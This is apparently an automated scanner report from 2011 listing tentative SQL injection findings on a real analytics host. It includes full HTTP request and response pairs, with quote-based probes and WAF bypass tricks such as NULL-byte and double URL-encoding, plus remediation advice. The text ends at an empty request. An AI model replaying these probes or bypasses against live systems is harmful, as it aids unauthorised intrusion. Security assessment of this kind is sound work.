Cross Site Scripting, SQL Injection, HTTP Header Injection, Report for January 27, 2011

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s41495727926958 [REST URL parameter 5] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s41495727926958

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/deyachtworld/1/H.17%00'/s41495727926958?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A25%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2266476&v32=2266476&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156025554%7C1298748025554%3B%20s_lv%3D1296156025556%7C1390764025556%3B%20s_lv_s%3DFirst%2520Visit%7C1296157825556%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:32:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 424
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld/1/H.17 was not found on this serve
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld/1/H.17%00''/s41495727926958?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A25%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2266476&v32=2266476&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156025554%7C1298748025554%3B%20s_lv%3D1296156025556%7C1390764025556%3B%20s_lv_s%3DFirst%2520Visit%7C1296157825556%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:32:04 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 0
Content-Type: text/html

1.2. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s42079387209378 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s42079387209378

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/deyachtworld%00'/1/H.17/s42079387209378?AQB=1&ndh=1&t=27/0/2011%2013%3A25%3A11%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/southpaw/&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&c23=Thursday&c24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_sess=%20s_sq%3D%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156311019%7C1298748311019%3B%20s_lv%3D1296156311021%7C1390764311021%3B%20s_lv_s%3DFirst%2520Visit%7C1296158111021%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 417
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld%00''/1/H.17/s42079387209378?AQB=1&ndh=1&t=27/0/2011%2013%3A25%3A11%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/southpaw/&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&c23=Thursday&c24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_sess=%20s_sq%3D%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156311019%7C1298748311019%3B%20s_lv%3D1296156311021%7C1390764311021%3B%20s_lv_s%3DFirst%2520Visit%7C1296158111021%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:17 GMT
Server: Omniture DC/2.0.0
xserver: www260
Content-Length: 0
Content-Type: text/html

1.3. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43482092181220 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s43482092181220

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/deyachtworld/1/H.17/s43482092181220?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A34%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2262662&v32=2262662&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:51 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/deyachtworld/1/H.17/s43482092181220 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/deyachtworld/1/H.17/s43482092181220?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A34%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2262662&v32=2262662&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:51 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 0
Content-Type: text/html

1.4. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43772089285776 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s43772089285776

Issue detail

Request 1

GET /b'/ss/deyachtworld/1/H.17/s43772089285776?AQB=1&ndh=1&t=27/0/2011%2013%3A24%3A8%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=searchResults_US&g=http%3A//www.yachtworld.com/core/listing/cache/searchResults.jsp%3Fcit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dhomepage%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26cur&r=http%3A//www.yachtworld.com/core/listing/advancedSearch.jsp%3FNtk%3DboatsEN%26searchtype%3Dhomepage%26fromYear%3D2004%26sm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26toLength%3D32%26fromLength%3D24%26fromPrice%3D0%26man%3Dregulator%26slim%3Dquick%26is%3Dfalse%26pricderange%3DSelect%2BPrice%2BRange&cc=USD&ch=Search&server=ywapp04&events=event2%2Cevent1&c1=Search%20Results&h1=Boats%7CAdvanced%20Search&v3=searchResults_US&c4=no%20search%20phrase%20entered&v4=no%20search%20phrase%20entered&c5=regulator&v5=regulator&c6=used&v6=used&c7=no%20search%20phrase%20entered&v7=no%20search%20phrase%20entered&c8=24%27-32%27&v8=24%27-32%27&c9=%3E2004&v9=%3E2004&c10=no%20search%20phrase%20entered&v10=no%20search%20phrase%20entered&c11=no%20search%20phrase%20entered&v11=no%20search%20phrase%20entered&c12=no%20search%20phrase%20entered&v12=no%20search%20phrase%20entered&c13=no%20search%20phrase%20entered&v13=no%20search%20phrase%20entered&c14=no%20search%20phrase%20entered&v14=no%20search%20phrase%20entered&c15=no%20search%20phrase%20entered&v15=no%20search%20phrase%20entered&c16=no%20search%20phrase%20entered&v16=no%20search%20phrase%20entered&c17=united%20states&v17=united%20states&c18=no%20search%20phrase%20entered&v18=no%20search%20phrase%20entered&c19=74&c20=Homepage&c21=Default&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v27=Homepage&v28=www.yachtworld.com&v31=Default&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=advancedSearch_US&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296156248340%7C1298748248340%3B%20s_lv%3D1296156248342%7C1390764248342%3B%20s_lv_s%3DFirst%2520Visit%7C1296158048342%3B; s_sess=%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:37:26 GMT
Server: Omniture DC/2.0.0
Content-Length: 441
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/deyachtworld/1/H.17/s43772089285776 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

